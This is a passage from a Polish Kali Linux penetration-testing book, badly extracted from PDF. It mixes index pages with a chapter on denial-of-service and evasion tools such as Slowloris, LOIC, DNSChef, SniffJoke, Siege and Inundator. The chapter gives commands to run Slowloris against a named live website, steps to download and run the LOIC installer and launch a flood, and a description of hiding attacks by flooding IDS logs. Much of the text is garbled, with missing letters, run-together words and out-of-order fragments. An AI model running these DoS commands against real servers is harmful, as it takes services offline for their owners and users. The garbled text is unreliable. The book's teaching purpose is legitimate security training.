pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
